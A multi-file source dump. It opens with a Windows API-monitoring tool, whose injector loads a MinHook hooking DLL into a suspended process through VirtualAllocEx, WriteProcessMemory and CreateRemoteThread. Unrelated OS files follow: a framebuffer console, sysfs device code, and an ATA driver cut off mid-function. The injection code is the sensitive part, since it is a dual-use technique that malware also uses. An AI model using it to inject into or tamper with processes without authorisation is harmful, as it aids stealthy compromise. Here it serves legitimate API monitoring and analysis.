    LPVOID proxy;   // address of our replacement (proxy) function
    LPVOID fp;      // presumably receives a pointer to the original function
                    // (trampoline) - verify against the hook installer
};
// logger object - exposes a stream to report to the IPC channel
Logger logger;
// Proxy Function Definitions
//============================================
typedef int (WINAPI *CONNECT)(SOCKET, const SOCKADDR*, int);
typedef int (WINAPI *CREATEPROCESSINTERNALW)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION, PHANDLE);
typedef int (WINAPI *LOADLIBRARYEXW)(LPCWSTR, HANDLE, DWORD);
typedef int (WINAPI *LOADLIBRARYW)(LPCWSTR);
typedef int (WINAPI *LOADLIBRARYA)(LPCSTR);
typedef FARPROC (WINAPI *GETPROCADDRESS)(HMODULE, LPCSTR);
// Trampoline Function Declarations
//============================================
GETPROCADDRESS fpGetProcAddress= NULL;
LOADLIBRARYA fpLoadLibraryA= NULL;
LOADLIBRARYW fpLoadLibraryW= NULL;
LOADLIBRARYEXW fpLoadLibraryExW= NULL;
CONNECT fpConnect= NULL;
CREATEPROCESSINTERNALW fpCreateProcessInternalW= NULL;
// Proxy Functions
//============================================
// Hook for ws2_32!connect: logs the peer address, then forwards the call.
int WINAPI ProxyConnect(SOCKET s, const sockaddr* name, int namelen)
{
	/*
	** Dynamically load WSAAddressToStringW from ws2_32 in order to resolve a
	** printable address from the sockaddr struct. GetModuleHandle is used (not
	** LoadLibrary) so ws2_32 is never pulled into a process that wasn't using it.
	*/
	typedef int (WINAPI *WSAADDRESSTOSTRINGW)(LPSOCKADDR, DWORD, LPDWORD, LPWSTR, LPDWORD);
	HMODULE hModule= GetModuleHandle("ws2_32");
	WSAADDRESSTOSTRINGW WSAAddressToStringW= hModule
		? (WSAADDRESSTOSTRINGW) GetProcAddress(hModule, "WSAAddressToStringW") : NULL;
	// 64 wchars covers any IPv4/IPv6 textual address plus port suffix; the
	// original 32-wchar buffer could fail on IPv6 and then log garbage, since
	// the conversion result was never checked.
	wchar_t addr[64]= L"<unknown>";
	DWORD sz= 64;
	if (WSAAddressToStringW)
		WSAAddressToStringW((SOCKADDR *)name, namelen, NULL, addr, &sz);
	logger << L"[HOOK] Intercepted call to connect:\n" << L"- IP Address: " << addr << std::endl;
	return fpConnect(s, name, namelen);
}
// Hook for kernelbase!CreateProcessInternalW: logs the process being spawned,
// then forwards to the original implementation.
int WINAPI ProxyCreateProcessInternalW
	(HANDLE hToken,
	LPCWSTR lpApplicationName,
	LPWSTR lpCommandLine,
	LPSECURITY_ATTRIBUTES lpProcessAttributes,
	LPSECURITY_ATTRIBUTES lpThreadAttributes,
	BOOL bInheritHandles,
	DWORD dwCreationFlags,
	LPVOID lpEnvironment,
	LPCWSTR lpCurrentDirectory,
	LPSTARTUPINFOW lpStartupInfo,
	LPPROCESS_INFORMATION lpProcessInformation,
	PHANDLE hNewToken)
{
	// Callers may pass NULL for either lpCommandLine or lpApplicationName (at
	// least one must be set); the original unconditionally streamed
	// lpCommandLine, which is undefined behaviour when it is NULL.
	LPCWSTR shown= lpCommandLine ? (LPCWSTR)lpCommandLine
		: (lpApplicationName ? lpApplicationName : L"<null>");
	logger << L"[HOOK] Intercepted call to CreateProcessInternalW:\n" << L"- Application Name: " << shown << std::endl;
	return fpCreateProcessInternalW(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation, hNewToken);
}
// Hook for kernel32!LoadLibraryExW: logs the requested library name, then
// forwards to the original via the trampoline.
int WINAPI ProxyLoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags)
{
	logger << L"[HOOK] Intercepted call to LoadLibraryExW:\n" << L"- Library Name: " << lpLibFileName << std::endl;
	return fpLoadLibraryExW(lpLibFileName, hFile, dwFlags);
}
// Hook for kernel32!LoadLibraryW: logs the requested library name, then
// forwards to the original via the trampoline.
int WINAPI ProxyLoadLibraryW(LPCWSTR lpLibFileName)
{
	logger << L"[HOOK] Intercepted call to LoadLibraryW:\n" << L"- Library Name: " << lpLibFileName << std::endl;
	return fpLoadLibraryW(lpLibFileName);
}
// Hook for kernel32!LoadLibraryA: widens and logs the requested library name,
// then forwards to the original via the trampoline.
int WINAPI ProxyLoadLibraryA(LPCSTR lpLibFileName)
{
	// Zero-initialized and MAX_PATH-sized: if the conversion fails (e.g. the
	// name exceeds the buffer) we log an empty string instead of reading
	// uninitialized stack memory, which the original 128-char buffer allowed.
	wchar_t wLibName[MAX_PATH]= {0};
	MultiByteToWideChar(CP_THREAD_ACP, (DWORD)0, lpLibFileName, -1, wLibName, MAX_PATH);
	logger << L"[HOOK] Intercepted call to LoadLibraryA:\n" << L"- Library Name: " << wLibName << std::endl;
	return fpLoadLibraryA(lpLibFileName);
}
// Hook for kernel32!GetProcAddress: logs the requested export, then forwards
// to the original via the trampoline.
FARPROC WINAPI ProxyGetProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
	wchar_t wProcName[128]= L"<ordinal import>";
	// GetProcAddress also accepts an ordinal smuggled into the low word of
	// lpProcName (high word == 0). Converting that value as if it were a string
	// pointer -- as the original did -- dereferences an invalid address, so
	// only convert genuine string names.
	if (((ULONG_PTR)lpProcName >> 16) != 0)
		MultiByteToWideChar(CP_THREAD_ACP, (DWORD)0, lpProcName, -1, wProcName, 128);
	logger << L"[HOOK] Intercepted call to GetProcAddress:\n" << L"- Function Name: " << wProcName << std::endl;
	return fpGetProcAddress(hModule, lpProcName);
}
<file_sep>#include <windows.h>
#include <iostream>
#include "MinHook.h"
#include "monitor.h"
#include "logger.h"
#pragma comment(lib, "libMinHook-x86mt.lib")
// Hooks that will be installed (see monitor.h)
//============================================
// Static table of hooks consumed by install_all(): owning module, export
// name, proxy, and the trampoline slot MinHook fills in.
HOOK_INFO hooks[]= {
	{
		L"ws2_32",
		"connect",
		&ProxyConnect,
		&fpConnect
	},
	{
		// CreateProcessInternalW is the undocumented kernelbase export that the
		// documented CreateProcess* family funnels into.
		L"kernelbase",
		"CreateProcessInternalW",
		&ProxyCreateProcessInternalW,
		&fpCreateProcessInternalW
	},
	{
		L"kernel32",
		"LoadLibraryExW",
		&ProxyLoadLibraryExW,
		&fpLoadLibraryExW
	},
	{
		L"kernel32",
		"LoadLibraryW",
		&ProxyLoadLibraryW,
		&fpLoadLibraryW
	},
	{
		L"kernel32",
		"LoadLibraryA",
		&ProxyLoadLibraryA,
		&fpLoadLibraryA
	},
	{
		L"kernel32",
		"GetProcAddress",
		&ProxyGetProcAddress,
		&fpGetProcAddress
	}
};
// Hook installation functions
//============================================
// Creates (but does not yet enable) the inline hook described by pHookInfo.
// Returns TRUE on success, FALSE if MinHook rejected the hook.
__forceinline BOOL install_hook(HOOK_INFO *pHookInfo)
{
	MH_STATUS status= MH_CreateHookApi(pHookInfo->lib, pHookInfo->target,
		pHookInfo->proxy, (LPVOID *)(pHookInfo->fp));
	return (status == MH_OK) ? TRUE : FALSE;
}
// Walks the static hook table and creates every hook, reporting failures as
// well as successes (the original silently dropped hooks that failed).
VOID install_all()
{
	int numElts= sizeof(hooks)/sizeof(hooks[0]);
	for (int i= 0; i < numElts; i++)
	{
		if (install_hook(&hooks[i]))
			logger << L"[+] Installed hook in: " << hooks[i].target << "\n";
		else
			logger << L"[-] Failed to install hook in: " << hooks[i].target << "\n";
	}
}
// DLL entry
//============================================
// DLL entry point: on process attach, initializes MinHook, installs all
// hooks, and enables them before the injector resumes the target's thread.
BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved)
{
	switch (reason)
	{
	case DLL_PROCESS_ATTACH:
		logger << L"[+] Installing hooks...\n";
		// The original ignored these return codes; fail the load rather than
		// continue with a half-initialized hooking engine.
		if (MH_Initialize() != MH_OK)
		{
			logger << L"[-] MinHook initialization failed" << std::endl;
			return FALSE;
		}
		install_all();
		if (MH_EnableHook(MH_ALL_HOOKS) != MH_OK)
			logger << L"[-] Failed to enable one or more hooks" << std::endl;
		logger << L"[+] Hooks installed, Resuming main thread..." << std::endl;
		break;
	}
	return TRUE;
}
<file_sep>#include <windows.h>
#include <iostream>
#include <tchar.h>
#pragma comment(lib, "shell32.lib")
// Inject a DLL with CreateRemoteThread
//====================================================
// Injects the DLL at dllPath into `process` by writing the path into the
// target and running LoadLibrary on it via CreateRemoteThread. Blocks until
// the remote load (and hence DllMain hook installation) has completed.
void inject_DLL(TCHAR *dllPath, HANDLE process)
{
	LPVOID lpBaseAddress= NULL;
	HANDLE hRemoteThread= NULL;
	HMODULE kernel32= NULL;
	FARPROC loadlibrary= NULL;
	SIZE_T pathLen;
	// Include the terminating NUL -- the original omitted it, so the remote
	// LoadLibrary could read past the end of the copied path.
	pathLen= (_tcslen(dllPath) + 1) * sizeof(TCHAR);
	kernel32= GetModuleHandle(_T("kernel32.dll"));
	// GetProcAddress always takes a narrow name (the original wrapped it in
	// _T(), which breaks under UNICODE). Pick the LoadLibrary variant matching
	// the character width the path buffer was written with.
#ifdef UNICODE
	loadlibrary= GetProcAddress(kernel32, "LoadLibraryW");
#else
	loadlibrary= GetProcAddress(kernel32, "LoadLibraryA");
#endif
	if (loadlibrary == NULL)
	{
		std::cout << "GetProcAddress failed: " << GetLastError() << std::endl;
		return;
	}
	lpBaseAddress= VirtualAllocEx(process, NULL, pathLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (lpBaseAddress == NULL)
	{
		std::cout << "VirtualAllocEx failed: " << GetLastError() << std::endl;
		return;
	}
	if (!WriteProcessMemory(process, lpBaseAddress, dllPath, pathLen, NULL))
	{
		std::cout << "WriteProcessMemory failed: " << GetLastError() << std::endl;
		return;
	}
	hRemoteThread= CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)(VOID *)loadlibrary, lpBaseAddress, NULL, 0);
	if (hRemoteThread == NULL)
	{
		std::cout << "CreateRemoteThread failed: " << GetLastError() << std::endl;
		return;
	}
	WaitForSingleObject(hRemoteThread, INFINITE);
	CloseHandle(hRemoteThread);
	// Release the remote path buffer; the original leaked it in the target.
	VirtualFreeEx(process, lpBaseAddress, 0, MEM_RELEASE);
}
// Open a log generated by the monitor
//====================================================
// Opens the "<target>_log.txt" file produced by the monitor next to the
// target executable. NOTE: truncates exePath in place (strips ".exe").
void open_log(TCHAR *exePath)
{
	TCHAR logPath[MAX_PATH + 8]= {0};
	SIZE_T len= _tcslen(exePath);
	// Guard against paths too short to carry an ".exe" extension.
	if (len < 4)
		return;
	exePath[len - 4]= _T('\0');
	_tcscat(logPath, exePath);
	// _T() keeps the literal valid in both ANSI and UNICODE builds; the
	// original narrow "_log.txt" broke compilation under UNICODE.
	_tcscat(logPath, _T("_log.txt"));
	ShellExecute(0, 0, logPath, 0, 0 , SW_SHOW );
}
// Entry: CreateProcess (suspended) > inject > resume
//====================================================
int main(int argc, TCHAR *argv[])
{
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	TCHAR *targetExe;
	TCHAR *dllName;
	TCHAR dllPath[MAX_PATH];
	if (argc < 3)
	{
		std::cout << "Not enough arguments\n" << "Usage: injector.exe <target> <dll>\n";
		return 1;
	}
	// _T() only works on string literals; argv elements are already TCHAR
	// strings (the original `_T(argv[1])` fails to compile under UNICODE).
	targetExe= argv[1];
	dllName= argv[2];
	// Resolve the DLL to an absolute path: the remote LoadLibrary resolves
	// relative paths against the *target's* working directory, not ours.
	if (!GetFullPathName(dllName, MAX_PATH, dllPath, NULL))
	{
		std::cout << "GetFullPathName failed: " << GetLastError() << std::endl;
		return 1;
	}
	ZeroMemory( &si, sizeof(si));
	ZeroMemory( &pi, sizeof(pi));
	si.cb = sizeof(si);
	// Create suspended so all hooks are installed before target code runs.
	if(!CreateProcess(NULL, targetExe, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
	{
		std::cout << "CreateProcess failed: " << GetLastError() << std::endl;
		return 1;
	}
	inject_DLL(dllPath, pi.hProcess);
	ResumeThread(pi.hThread);
	WaitForSingleObject(pi.hProcess, INFINITE);
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	open_log(targetExe);
	return 0;
}
This is a basic API monitoring program for running Windows executables and intercepting their calls to the WinAPI. It uses MinHook as an inline hooking engine and DLL injection as the process injection technique.
#### injector
The injector uses DLL injection and may be flagged by AV, since it relies on API call sequences commonly found in malware.
- Creates target process as suspended
- Writes to process space with VirtualAlloc and WriteProcessMemory
- Executes remote thread to load the monitor DLL and install hooks
- Resumes target thread after hooks have been installed
#### monitor
The monitor, once injected, installs hooks that report intercepted calls made by the injected process. **Compilation:** use `/LD` (MSVC compiler) to create as a DLL. The monitor depends on [minhook](https://github.com/TsudaKageyu/minhook) so be sure to link that library and use the minhook.h header.
#### todo
- add native (Nt/Zw) hooks
| a8d509126e49e9fdfddb5045cef05ee9ea862bb0 | [
"Markdown",
"C++"
] | 4 | C++ | ra2003/win-api-monitor | 73e23ae7d38c250f9bf4b029dd2a11bbc134e488 | cf296cd5d9aeade2d8c438d1181b4382a1476134 |
refs/heads/master | <file_sep>
#include <frigg/debug.hpp>
#include <arch/io_space.hpp>
#include "../arch/x86/cpu.hpp"
#include "../arch/x86/hpet.hpp"
#include "../generic/fiber.hpp"
#include "../generic/io.hpp"
#include "../generic/kernel_heap.hpp"
#include "../generic/service_helpers.hpp"
#include "pci/pci.hpp"
#include "fb.hpp"
#include "boot-screen.hpp"
#include <mbus.frigg_pb.hpp>
#include <hw.frigg_pb.hpp>
extern uint8_t fontBitmap[];
namespace thor {
// ------------------------------------------------------------------------
// window handling
// ------------------------------------------------------------------------
// Glyph cell size of the built-in bitmap font, in pixels.
constexpr size_t fontHeight = 16;
constexpr size_t fontWidth = 8;

// Packs 8-bit RGB components into a 0x00RRGGBB pixel value.
constexpr uint32_t rgb(int r, int g, int b) {
	return (r << 16) | (g << 8) | b;
}

// The 16 standard terminal colors (8 normal + 8 bright variants),
// indexed by the fg/bg arguments of setChars()/setBlanks().
constexpr uint32_t rgbColor[16] = {
	rgb(1, 1, 1),
	rgb(222, 56, 43),
	rgb(57, 181, 74),
	rgb(255, 199, 6),
	rgb(0, 111, 184),
	rgb(118, 38, 113),
	rgb(44, 181, 233),
	rgb(204, 204, 204),
	rgb(128, 128, 128),
	rgb(255, 0, 0),
	rgb(0, 255, 0),
	rgb(255, 255, 0),
	rgb(0, 0, 255),
	rgb(255, 0, 255),
	rgb(0, 255, 255),
	rgb(255, 255, 255)
};

// Background used for blanks and when clearing the whole screen.
constexpr uint32_t defaultBg = rgb(16, 16, 16);
// TextDisplay implementation that renders a character grid directly into a
// linear 32bpp framebuffer.
struct FbDisplay : TextDisplay {
	// ptr: CPU-visible framebuffer window. pitch is in *bytes* and must be a
	// multiple of 4; it is stored internally in units of uint32_t pixels.
	FbDisplay(void *ptr, unsigned int width, unsigned int height, size_t pitch)
	: _width{width}, _height{height}, _pitch{pitch / sizeof(uint32_t)} {
		assert(!(pitch % sizeof(uint32_t)));
		setWindow(ptr);
		_clearScreen(defaultBg);
	}

	// Re-points the display at a different mapping of the same framebuffer
	// (used when switching from the early boot window to the kernel mapping).
	void setWindow(void *ptr) {
		_window = reinterpret_cast<uint32_t *>(ptr);
	}

	int getWidth() override;
	int getHeight() override;

	void setChars(unsigned int x, unsigned int y,
			const char *c, int count, int fg, int bg) override;
	void setBlanks(unsigned int x, unsigned int y, int count, int bg) override;

private:
	void _clearScreen(uint32_t rgb_color);

	volatile uint32_t *_window;  // current framebuffer mapping
	unsigned int _width;         // in pixels
	unsigned int _height;        // in pixels
	size_t _pitch;               // in uint32_t pixels, not bytes
};
// Display size in character cells (not pixels).
int FbDisplay::getWidth() {
	return _width / fontWidth;
}

int FbDisplay::getHeight() {
	return _height / fontHeight;
}
// Renders `count` glyphs starting at character cell (x, y). fg/bg index
// rgbColor; a negative bg selects the default background.
void FbDisplay::setChars(unsigned int x, unsigned int y,
		const char *c, int count, int fg, int bg) {
	auto fg_rgb = rgbColor[fg];
	auto bg_rgb = (bg < 0) ? defaultBg : rgbColor[bg];

	auto dest_line = _window + y * fontHeight * _pitch + x * fontWidth;
	for(size_t i = 0; i < fontHeight; i++) {
		auto dest = dest_line;
		for(int k = 0; k < count; k++) {
			// Characters outside the printable ASCII range draw as glyph 127.
			auto dc = (c[k] >= 32 && c[k] <= 127) ? c[k] : 127;
			// fontBitmap holds one byte per scanline per glyph; the most
			// significant bit is the leftmost pixel.
			auto fontbits = fontBitmap[(dc - 32) * fontHeight + i];
			for(size_t j = 0; j < fontWidth; j++) {
				int bit = (1 << ((fontWidth - 1) - j));
				*dest++ = (fontbits & bit) ? fg_rgb : bg_rgb;
			}
		}
		dest_line += _pitch;
	}
}
void FbDisplay::setBlanks(unsigned int x, unsigned int y, int count, int bg) {
auto bg_rgb = (bg < 0) ? defaultBg : rgbColor[bg];
auto dest_line = _window + y * fontHeight * _pitch + x * fontWidth;
for(size_t i = 0; i < fontHeight; i++) {
auto dest = dest_line;
for(int k = 0; k < count; k++) {
for(size_t j = 0; j < fontWidth; j++)
*dest++ = bg_rgb;
}
dest_line += _pitch;
}
}
// Paints every visible pixel with the given color. The pitch may exceed the
// visible width, so rows are advanced via _pitch rather than _width.
void FbDisplay::_clearScreen(uint32_t rgb_color) {
	auto row = _window;
	for(size_t y = 0; y < _height; ++y) {
		for(size_t x = 0; x < _width; ++x)
			row[x] = rgb_color;
		row += _pitch;
	}
}
namespace {
	// Boot framebuffer singletons; set up by initializeBootFb().
	frigg::LazyInitializer<FbInfo> bootInfo;
	frigg::LazyInitializer<FbDisplay> bootDisplay;
	frigg::LazyInitializer<BootScreen> bootScreen;
}
// Records the boot loader's framebuffer parameters and brings up an early
// text console on it, rendering through the given early (lower-half) window.
// Log output is mirrored to this console from here on.
void initializeBootFb(uint64_t address, uint64_t pitch, uint64_t width,
		uint64_t height, uint64_t bpp, uint64_t type, void *early_window) {
	bootInfo.initialize();
	auto fb_info = bootInfo.get();
	fb_info->address = address;
	fb_info->pitch = pitch;
	fb_info->width = width;
	fb_info->height = height;
	fb_info->bpp = bpp;
	fb_info->type = type;

	// Initialize the framebuffer with a lower-half window.
	bootDisplay.initialize(early_window,
			fb_info->width, fb_info->height, fb_info->pitch);
	bootScreen.initialize(bootDisplay.get());

	enableLogHandler(bootScreen.get());
}
// Remaps the boot framebuffer into kernel virtual memory (write-combining),
// wraps it in a HardwareMemory object, and attaches it to the PCI device
// whose memory BAR contains the framebuffer's physical range.
void transitionBootFb() {
	auto window_size = (bootInfo->height * bootInfo->pitch + (kPageSize - 1)) & ~(kPageSize - 1);
	assert(window_size <= 0x1'000'000);
	auto window = KernelVirtualMemory::global().allocate(0x1'000'000);
	for(size_t pg = 0; pg < window_size; pg += kPageSize)
		KernelPageSpace::global().mapSingle4k(VirtualAddr(window) + pg,
				bootInfo->address + pg, page_access::write, CachingMode::writeCombine);

	// Transition to the kernel mapping window.
	bootDisplay->setWindow(window);

	assert(!(bootInfo->address & (kPageSize - 1)));
	bootInfo->memory = frigg::makeShared<HardwareMemory>(*kernelAlloc,
			bootInfo->address & ~(kPageSize - 1),
			(bootInfo->height * bootInfo->pitch + (kPageSize - 1)) & ~(kPageSize - 1),
			CachingMode::writeCombine);

	// Try to attach the framebuffer to a PCI device: the owner is the device
	// with a memory BAR that fully covers the framebuffer's physical range.
	pci::PciDevice *owner = nullptr;
	for(auto it = pci::allDevices->begin(); it != pci::allDevices->end(); ++it) {
		auto checkBars = [&] () -> bool {
			for(int i = 0; i < 6; i++) {
				if((*it)->bars[i].type != pci::PciDevice::kBarMemory)
					continue;
				// TODO: Careful about overflow here.
				auto bar_begin = (*it)->bars[i].address;
				auto bar_end = (*it)->bars[i].address + (*it)->bars[i].length;
				if(bootInfo->address >= bar_begin
						&& bootInfo->address + bootInfo->height * bootInfo->pitch <= bar_end)
					return true;
			}
			return false;
		};

		if(checkBars()) {
			// Exactly one device may own the framebuffer range.
			assert(!owner);
			owner = it->get();
		}
	}

	if(!owner)
		frigg::panicLogger() << "thor: Could not find owner for boot framebuffer" << frigg::endLog;
	frigg::infoLogger() << "thor: Boot framebuffer is attached to PCI device "
			<< owner->bus << "." << owner->slot << "." << owner->function << frigg::endLog;
	owner->associatedFrameBuffer = bootInfo.get();
	owner->associatedScreen = bootScreen.get();
}
} // namespace thor
<file_sep>
#include <linux/netlink.h>
#include <sstream>
#include "drvcore.hpp"
#include "nl-socket.hpp"
namespace drvcore {
// Roots of the sysfs object tree; created by initialize().
std::shared_ptr<sysfs::Object> globalDevicesObject;
std::shared_ptr<sysfs::Object> globalClassObject;
std::shared_ptr<sysfs::Object> globalCharObject;
std::shared_ptr<sysfs::Object> globalBlockObject;

std::shared_ptr<sysfs::Object> inputClassObject;
std::shared_ptr<sysfs::Object> cardObject;

// Accessors that assert initialize() has already been called.
sysfs::Object *devicesObject() {
	assert(globalDevicesObject);
	return globalDevicesObject.get();
}

sysfs::Object *classObject() {
	assert(globalClassObject);
	return globalClassObject.get();
}
// The "uevent" attribute for the hard-coded /sys/devices/card0 DRM object;
// reading it yields the DEVNAME line udev expects for /dev/dri/card0.
struct Card0UeventAttribute : sysfs::Attribute {
	static auto singleton() {
		static Card0UeventAttribute attr;
		return &attr;
	}

private:
	Card0UeventAttribute()
	: sysfs::Attribute("uevent", true) { }

public:
	virtual COFIBER_ROUTINE(async::result<std::string>, show(sysfs::Object *object) override, ([=] {
		// This attribute is only ever realized on the card0 object.
		assert(object == cardObject.get());
		COFIBER_RETURN(std::string{"DEVNAME=dri/card0\n"});
	}))
};
// Generic "uevent" attribute for drvcore Devices: reports DEVNAME/MAJOR/MINOR
// for the device's unix device node, if it has one.
struct UeventAttribute : sysfs::Attribute {
	static auto singleton() {
		static UeventAttribute attr;
		return &attr;
	}

private:
	UeventAttribute()
	: sysfs::Attribute("uevent", true) { }

public:
	virtual COFIBER_ROUTINE(async::result<std::string>, show(sysfs::Object *object) override, ([=] {
		// Safe downcast: this attribute is only realized on Device objects
		// (see installDevice()).
		auto device = static_cast<Device *>(object);

		std::stringstream ss;
		if(auto unix_dev = device->unixDevice(); unix_dev) {
			auto node_path = unix_dev->nodePath();
			// Devices without a /dev node still report their major:minor.
			if(!node_path.empty())
				ss << "DEVNAME=" << node_path << '\n';
			ss << "MAJOR=" << unix_dev->getId().first << '\n';
			ss << "MINOR=" << unix_dev->getId().second << '\n';
		}
		COFIBER_RETURN(ss.str());
	}))
};
//-----------------------------------------------------------------------------
// Device implementation.
//-----------------------------------------------------------------------------
// A Device without an explicit parent is attached directly below
// /sys/devices; unix_device may be null for devices without a /dev node.
Device::Device(std::shared_ptr<Device> parent, std::string name, UnixDevice *unix_device)
: sysfs::Object{parent ? parent : globalDevicesObject, std::move(name)},
		_unixDevice{unix_device} { }
//-----------------------------------------------------------------------------
// Free functions.
//-----------------------------------------------------------------------------
// Builds the initial sysfs hierarchy and sets up the uevent netlink channel.
// Must run before any installDevice()/emitHotplug() call.
void initialize() {
	// Kernel uevents are delivered over this netlink protocol; 32 multicast groups.
	nl_socket::configure(NETLINK_KOBJECT_UEVENT, 32);

	// Create the /sys/dev/{char,block} directories.
	auto dev_object = std::make_shared<sysfs::Object>(nullptr, "dev");
	globalCharObject = std::make_shared<sysfs::Object>(dev_object, "char");
	globalBlockObject = std::make_shared<sysfs::Object>(dev_object, "block");

	// Create the global /sys/{devices,class,dev} directories.
	globalDevicesObject = std::make_shared<sysfs::Object>(nullptr, "devices");
	globalClassObject = std::make_shared<sysfs::Object>(nullptr, "class");
	globalDevicesObject->addObject();
	globalClassObject->addObject();
	dev_object->addObject();
	globalCharObject->addObject(); // TODO: Do this before dev_object is visible.
	globalBlockObject->addObject();

	// Hard-coded DRM card0 object plus its /sys/class/drm symlink.
	cardObject = std::make_shared<sysfs::Object>(globalDevicesObject, "card0");
	cardObject->addObject();
	cardObject->realizeAttribute(Card0UeventAttribute::singleton());

	auto drm_object = std::make_shared<sysfs::Object>(globalClassObject, "drm");
	drm_object->addObject();
	drm_object->createSymlink("card0", cardObject);

	inputClassObject = std::make_shared<sysfs::Object>(globalClassObject, "input");
	inputClassObject->addObject();
}
// Makes a device visible in sysfs: realizes its directory and uevent
// attribute, links it into the class tree, and registers its char-device id
// under /sys/dev/char.
void installDevice(std::shared_ptr<Device> device) {
	device->addObject();

	// TODO: Do this before the object becomes visible in sysfs.
	device->realizeAttribute(UeventAttribute::singleton());

	// NOTE(review): every device is linked under the "input" class here,
	// regardless of its actual subsystem -- confirm this is intentional.
	device->createSymlink("subsystem", inputClassObject);
	inputClassObject->createSymlink(device->name(), device);

	if(auto unix_dev = device->unixDevice(); unix_dev) {
		std::stringstream id_ss;
		id_ss << unix_dev->getId().first << ":" << unix_dev->getId().second;
		// Only character devices are supported by this path so far.
		assert(unix_dev->type() == VfsType::charDevice);
		globalCharObject->createSymlink(id_ss.str(), device);
	}
}
// Broadcasts a pre-formatted kobject-uevent message to netlink multicast
// group 1 (the group udev listens on).
void emitHotplug(std::string buffer) {
	nl_socket::broadcast(NETLINK_KOBJECT_UEVENT, 1, std::move(buffer));
}
} // namespace drvcore
<file_sep>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <iostream>
#include <queue>
#include <async/result.hpp>
#include <arch/io_space.hpp>
#include <arch/register.hpp>
#include <helix/ipc.hpp>
#include <blockfs.hpp>
namespace {
	// Debugging switches: trace IRQ handling / request lifecycle on stdout.
	constexpr bool logIrqs = false;
	constexpr bool logRequests = false;
}

// --------------------------------------------------------
// Controller class
// --------------------------------------------------------

// Register offsets relative to the primary ATA command block (base 0x1F0).
// Note that offset 7 reads status but writes the command register.
namespace regs {
	inline constexpr arch::scalar_register<uint16_t> inData{0};
	inline constexpr arch::scalar_register<uint8_t> inStatus{7};

	inline constexpr arch::scalar_register<uint8_t> outSectorCount{2};
	inline constexpr arch::scalar_register<uint8_t> outLba1{3};
	inline constexpr arch::scalar_register<uint8_t> outLba2{4};
	inline constexpr arch::scalar_register<uint8_t> outLba3{5};
	inline constexpr arch::scalar_register<uint8_t> outDevice{6};
	inline constexpr arch::scalar_register<uint8_t> outCommand{7};
}

// Control block (base 0x3F6): the alternate status register can be read
// without acknowledging a pending IRQ.
namespace alt_regs {
	inline constexpr arch::scalar_register<uint8_t> inStatus{0};
}
// PIO driver for the legacy primary ATA channel, exposed as a 512-byte-sector
// blockfs::BlockDevice. Requests are queued and processed one at a time.
class Controller : public blockfs::BlockDevice {
public:
	Controller();

public:
	void run();

private:
	cofiber::no_future _handleIrqs();

public:
	async::result<void> readSectors(uint64_t sector, void *buffer,
			size_t num_sectors) override;

private:
	enum Commands {
		kCommandReadSectorsExt = 0x24   // READ SECTORS EXT (LBA48)
	};

	enum Flags {
		kStatusErr = 0x01,
		kStatusDrq = 0x08,
		kStatusDf = 0x20,
		kStatusRdy = 0x60,
		kStatusBsy = 0x80,

		kDeviceSlave = 0x10,
		kDeviceLba = 0x40
	};

	// One queued read: progress is tracked in sectorsRead and the promise is
	// fulfilled once all sectors arrived.
	struct Request {
		uint64_t sector;
		size_t numSectors;
		size_t sectorsRead;
		void *buffer;
		async::promise<void> promise;
	};

	std::queue<Request> _requestQueue;

	helix::UniqueDescriptor _irq;
	HelHandle _ioHandle;
	arch::io_space _ioSpace;    // command block at 0x1F0
	arch::io_space _altSpace;   // control block at 0x3F6
	bool _inRequest;            // true while a request is on the wire
};
// Claims IRQ 14 and the primary-channel I/O ports of the legacy ATA interface.
Controller::Controller()
: BlockDevice{512}, _ioSpace{0x1F0}, _altSpace{0x3F6}, _inRequest{false} {
	HelHandle irq_handle;
	HEL_CHECK(helAccessIrq(14, &irq_handle));
	_irq = helix::UniqueDescriptor{irq_handle};

	uintptr_t ports[] = { 0x1F0, 0x1F1, 0x1F2, 0x1F3, 0x1F4, 0x1F5, 0x1F6, 0x1F7, 0x3F6 };
	HEL_CHECK(helAccessIo(ports, 9, &_ioHandle));
	HEL_CHECK(helEnableIo(_ioHandle));
}
// Starts the IRQ-handling coroutine and registers the device with blockfs.
void Controller::run() {
	_handleIrqs();

	blockfs::runDevice(this);
}
// IRQ loop: each IRQ signals that one sector of the current request is ready
// in the data register. Reads it via PIO and completes the request (and kicks
// the next one) once all sectors have arrived.
COFIBER_ROUTINE(cofiber::no_future, Controller::_handleIrqs(), ([=] {
	uint64_t sequence = 0;
	while(true) {
		if(logIrqs)
			std::cout << "block-ata: Awaiting IRQ." << std::endl;
		helix::AwaitEvent await_irq;
		auto &&submit = helix::submitAwaitEvent(_irq, &await_irq, sequence,
				helix::Dispatcher::global());
		COFIBER_AWAIT submit.async_wait();
		HEL_CHECK(await_irq.error());
		sequence = await_irq.sequence();
		if(logIrqs)
			std::cout << "block-ata: IRQ fired." << std::endl;

		// Check if the device is ready without clearing the IRQ.
		// (Reading the alternate status register does not acknowledge it.)
		auto status = _altSpace.load(alt_regs::inStatus);
		if(status & kStatusBsy) {
			// Not for us yet: nack so a shared-IRQ peer can be tried.
			HEL_CHECK(helAcknowledgeIrq(_irq.getHandle(), kHelAckNack, sequence));
			continue;
		}
		assert(!(status & (kStatusErr | kStatusDf)));
		assert(status & kStatusRdy);
		assert(status & kStatusDrq);

		// Clear and acknowledge the IRQ.
		// (Reading the regular status register clears the device's IRQ line.)
		auto cleared = _ioSpace.load(regs::inStatus);
		HEL_CHECK(helAcknowledgeIrq(_irq.getHandle(), kHelAckAcknowledge, sequence));
		assert(!(cleared & (kStatusErr | kStatusDf)));
		assert(cleared & kStatusRdy);
		assert(cleared & kStatusDrq);
